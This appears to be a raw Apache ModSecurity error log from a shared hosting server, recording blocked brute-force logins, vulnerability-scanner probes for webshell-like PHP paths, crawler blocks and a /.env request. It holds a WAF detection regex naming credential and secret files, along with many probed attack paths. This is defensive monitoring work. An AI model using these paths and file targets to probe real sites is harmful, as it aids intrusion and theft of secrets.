[Tue May 26 19:46:07.075596 2026] [security2:error] [pid 77894:tid 78114] [client 82.24.116.217:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWrJjomEhVPuJoD1MZqoAAAAFo"]
[Tue May 26 19:46:07.468677 2026] [security2:error] [pid 77894:tid 77960] [remote 115.79.143.180:32796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.143.79.115.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrJzomEhVPuJoD1MZqrQAAbUE"]
[Tue May 26 19:46:08.144219 2026] [security2:error] [pid 77894:tid 77958] [remote 115.79.143.180:32796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.143.79.115.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrKDomEhVPuJoD1MZqxwAAGT8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:46:08.965176 2026] [security2:error] [pid 77894:tid 78025] [client 20.226.60.108:7396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/ms-edit.php"] [unique_id "ahWrKDomEhVPuJoD1MZq5wAAAAE"]
[Tue May 26 19:46:08.965287 2026] [security2:error] [pid 77894:tid 78025] [client 20.226.60.108:7396] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/ms-edit.php"] [unique_id "ahWrKDomEhVPuJoD1MZq5wAAAAE"]
[Tue May 26 19:46:09.176900 2026] [security2:error] [pid 77894:tid 78115] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrKDomEhVPuJoD1MZq2gAAAFs"]
[Tue May 26 19:46:11.152591 2026] [security2:error] [pid 77894:tid 78147] [client 114.119.146.45:21257] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/index/2"] [unique_id "ahWrKzomEhVPuJoD1MZrIQAAAHs"], referer: https://www.cagmedya.com/referanslar/index/3
[Tue May 26 19:46:11.800641 2026] [security2:error] [pid 77894:tid 78146] [client 20.226.60.108:24024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/simple.php"] [unique_id "ahWrKzomEhVPuJoD1MZrMwAAAHo"]
[Tue May 26 19:46:11.800775 2026] [security2:error] [pid 77894:tid 78146] [client 20.226.60.108:24024] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/simple.php"] [unique_id "ahWrKzomEhVPuJoD1MZrMwAAAHo"]
[Tue May 26 19:46:12.191850 2026] [security2:error] [pid 77894:tid 78099] [client 44.217.24.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWrLDomEhVPuJoD1MZrRQAAAEs"]
[Tue May 26 19:46:12.435053 2026] [security2:error] [pid 77894:tid 78049] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrKzomEhVPuJoD1MZrPAAAABk"]
[Tue May 26 19:46:12.893102 2026] [security2:error] [pid 77894:tid 78056] [client 20.226.60.108:11810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/bgymj.php"] [unique_id "ahWrLDomEhVPuJoD1MZrWAAAACA"]
[Tue May 26 19:46:12.893232 2026] [security2:error] [pid 77894:tid 78056] [client 20.226.60.108:11810] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/bgymj.php"] [unique_id "ahWrLDomEhVPuJoD1MZrWAAAACA"]
[Tue May 26 19:46:15.191784 2026] [security2:error] [pid 77894:tid 78130] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrLjomEhVPuJoD1MZrjgAAAGo"]
[Tue May 26 19:46:16.746827 2026] [security2:error] [pid 77894:tid 78112] [client 14.245.67.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrMDomEhVPuJoD1MZruwAAAFg"]
[Tue May 26 19:46:16.982957 2026] [security2:error] [pid 77894:tid 78073] [client 20.226.60.108:25653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWrMDomEhVPuJoD1MZr0wAAADE"]
[Tue May 26 19:46:16.983111 2026] [security2:error] [pid 77894:tid 78073] [client 20.226.60.108:25653] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWrMDomEhVPuJoD1MZr0wAAADE"]
[Tue May 26 19:46:17.782975 2026] [security2:error] [pid 77894:tid 78028] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrMTomEhVPuJoD1MZr5gAAAAQ"]
[Tue May 26 19:46:20.346872 2026] [security2:error] [pid 77894:tid 78030] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrMzomEhVPuJoD1MZsOgAAAAY"]
[Tue May 26 19:46:22.828488 2026] [security2:error] [pid 77894:tid 78095] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrNjomEhVPuJoD1MZsfQAAAEc"]
[Tue May 26 19:46:23.066149 2026] [security2:error] [pid 77894:tid 78097] [client 114.119.154.30:32051] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/index.php/portfolio_page/branded-bull"] [unique_id "ahWrNzomEhVPuJoD1MZskQAAAEk"], referer: https://virgence.com/index.php/portfolio_page/branded-bull
[Tue May 26 19:46:23.887804 2026] [security2:error] [pid 77894:tid 78115] [client 20.226.60.108:9978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/404.php"] [unique_id "ahWrNzomEhVPuJoD1MZspQAAAFs"]
[Tue May 26 19:46:23.887921 2026] [security2:error] [pid 77894:tid 78115] [client 20.226.60.108:9978] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/404.php"] [unique_id "ahWrNzomEhVPuJoD1MZspQAAAFs"]
[Tue May 26 19:46:25.589683 2026] [security2:error] [pid 77894:tid 78097] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrOTomEhVPuJoD1MZsygAAAEk"]
[Tue May 26 19:46:26.124491 2026] [security2:error] [pid 77894:tid 78036] [client 20.226.60.108:10018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/file3.php"] [unique_id "ahWrOjomEhVPuJoD1MZs5QAAAAw"]
[Tue May 26 19:46:26.124596 2026] [security2:error] [pid 77894:tid 78036] [client 20.226.60.108:10018] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/file3.php"] [unique_id "ahWrOjomEhVPuJoD1MZs5QAAAAw"]
[Tue May 26 19:46:27.731836 2026] [security2:error] [pid 77894:tid 78048] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrOzomEhVPuJoD1MZtBAAAABg"]
[Tue May 26 19:46:29.937050 2026] [autoindex:error] [pid 77894:tid 78133] [client 194.163.172.80:62723] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:46:31.883705 2026] [security2:error] [pid 77894:tid 78147] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrPzomEhVPuJoD1MZteAAAAHs"]
[Tue May 26 19:46:32.036045 2026] [security2:error] [pid 77894:tid 78089] [client 173.239.254.136:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWrPjomEhVPuJoD1MZtYgAAQRk"]
[Tue May 26 19:46:33.342357 2026] [security2:error] [pid 77894:tid 78142] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrQDomEhVPuJoD1MZtowAAAHY"]
[Tue May 26 19:46:33.521144 2026] [autoindex:error] [pid 77894:tid 78073] [client 66.132.186.191:5516] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:46:35.282144 2026] [security2:error] [pid 77894:tid 78031] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrQjomEhVPuJoD1MZt1gAAAAc"]
[Tue May 26 19:46:36.839544 2026] [security2:error] [pid 77894:tid 78133] [client 176.65.139.237:18164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mpdpl.in"] [uri "/.env"] [unique_id "ahWrRDomEhVPuJoD1MZuCQAAAG0"]
[Tue May 26 19:46:36.864187 2026] [security2:error] [pid 77894:tid 78083] [client 185.242.3.182:62716] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "katalystconsulting.svijaykumar.in"] [uri "/index.htm"] [unique_id "ahWrRDomEhVPuJoD1MZuCgAAADs"]
[Tue May 26 19:46:38.325913 2026] [security2:error] [pid 77894:tid 78063] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrRTomEhVPuJoD1MZuLAAAACc"]
[Tue May 26 19:46:38.369805 2026] [security2:error] [pid 77894:tid 78119] [client 20.226.60.108:9991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/wp-mail.php"] [unique_id "ahWrRjomEhVPuJoD1MZuPwAAAF8"]
[Tue May 26 19:46:38.369905 2026] [security2:error] [pid 77894:tid 78119] [client 20.226.60.108:9991] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/wp-mail.php"] [unique_id "ahWrRjomEhVPuJoD1MZuPwAAAF8"]
[Tue May 26 19:46:39.103895 2026] [security2:error] [pid 77894:tid 77938] [remote 46.62.185.67:58352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrRjomEhVPuJoD1MZuSwAACis"]
[Tue May 26 19:46:39.513570 2026] [security2:error] [pid 77894:tid 78150] [client 45.148.10.16:36110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "medlivon.com.thedebateafrica.org"] [uri "/en"] [unique_id "ahWrRzomEhVPuJoD1MZuYwAAAH4"]
[Tue May 26 19:46:41.216391 2026] [security2:error] [pid 77894:tid 78077] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrSDomEhVPuJoD1MZufwAAADU"]
[Tue May 26 19:46:41.373476 2026] [security2:error] [pid 77894:tid 77951] [remote 54.37.3.199:38350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.3.37.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWrSTomEhVPuJoD1MZulQAAWTg"]
[Tue May 26 19:46:41.785521 2026] [security2:error] [pid 77894:tid 78069] [client 20.226.60.108:26562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/about.php"] [unique_id "ahWrSTomEhVPuJoD1MZuogAAAC0"]
[Tue May 26 19:46:41.785644 2026] [security2:error] [pid 77894:tid 78069] [client 20.226.60.108:26562] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/about.php"] [unique_id "ahWrSTomEhVPuJoD1MZuogAAAC0"]
[Tue May 26 19:46:41.809793 2026] [security2:error] [pid 77894:tid 78127] [client 114.119.133.119:44799] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gciamd.org.in"] [uri "/images/amd-BharatEpur-GM.png"] [unique_id "ahWrSTomEhVPuJoD1MZuowAAAGc"], referer: https://www.gciamd.org.in/images/amd-BharatEpur-GM.png
[Tue May 26 19:46:41.933554 2026] [security2:error] [pid 77894:tid 78089] [client 216.73.217.138:10665] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahWrSTomEhVPuJoD1MZulwAAQTY"]
[Tue May 26 19:46:42.291543 2026] [security2:error] [pid 77894:tid 78068] [client 99.48.44.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrSTomEhVPuJoD1MZupgAAACw"]
[Tue May 26 19:46:42.817189 2026] [security2:error] [pid 77894:tid 78088] [client 216.73.217.138:10665] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahWrSjomEhVPuJoD1MZurQAAQEo"], referer: https://yatirimfinans.cagmedya.com/egitmenler/?feed=rss2
[Tue May 26 19:46:43.470964 2026] [security2:error] [pid 77894:tid 78110] [client 20.226.60.108:14258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/wp.php"] [unique_id "ahWrSzomEhVPuJoD1MZu0wAAAFY"]
[Tue May 26 19:46:43.471156 2026] [security2:error] [pid 77894:tid 78110] [client 20.226.60.108:14258] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/wp.php"] [unique_id "ahWrSzomEhVPuJoD1MZu0wAAAFY"]
[Tue May 26 19:46:43.777198 2026] [security2:error] [pid 77894:tid 78037] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrSzomEhVPuJoD1MZuzwAAAA0"]
[Tue May 26 19:46:43.807701 2026] [security2:error] [pid 77894:tid 77971] [remote 54.37.3.199:38350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.3.37.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWrSzomEhVPuJoD1MZu3QAASUw"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:46:44.782155 2026] [security2:error] [pid 77894:tid 78101] [client 20.226.60.108:13868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/.dj/index.php"] [unique_id "ahWrTDomEhVPuJoD1MZu-QAAAE0"]
[Tue May 26 19:46:44.782292 2026] [security2:error] [pid 77894:tid 78101] [client 20.226.60.108:13868] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/.dj/index.php"] [unique_id "ahWrTDomEhVPuJoD1MZu-QAAAE0"]
[Tue May 26 19:46:45.732222 2026] [security2:error] [pid 77894:tid 78102] [client 20.226.60.108:13425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/adminfuns.php"] [unique_id "ahWrTTomEhVPuJoD1MZvGQAAAE4"]
[Tue May 26 19:46:45.732342 2026] [security2:error] [pid 77894:tid 78102] [client 20.226.60.108:13425] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/adminfuns.php"] [unique_id "ahWrTTomEhVPuJoD1MZvGQAAAE4"]
[Tue May 26 19:46:46.299379 2026] [security2:error] [pid 77894:tid 78115] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrTTomEhVPuJoD1MZvJQAAAFs"]
[Tue May 26 19:46:46.529752 2026] [security2:error] [pid 77894:tid 78101] [client 20.226.60.108:13799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/php8.php"] [unique_id "ahWrTjomEhVPuJoD1MZvPAAAAE0"]
[Tue May 26 19:46:46.529843 2026] [security2:error] [pid 77894:tid 78101] [client 20.226.60.108:13799] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/php8.php"] [unique_id "ahWrTjomEhVPuJoD1MZvPAAAAE0"]
[Tue May 26 19:46:46.597717 2026] [security2:error] [pid 77894:tid 77981] [remote 185.15.230.106:37470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.230.15.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrTjomEhVPuJoD1MZvOwAAB1Y"]
[Tue May 26 19:46:47.000840 2026] [security2:error] [pid 77894:tid 77964] [remote 92.205.188.156:53418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWrTjomEhVPuJoD1MZvPQAAZ0U"]
[Tue May 26 19:46:47.263369 2026] [security2:error] [pid 77894:tid 78147] [client 20.226.60.108:6736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/classwithtostring.php"] [unique_id "ahWrTzomEhVPuJoD1MZvUQAAAHs"]
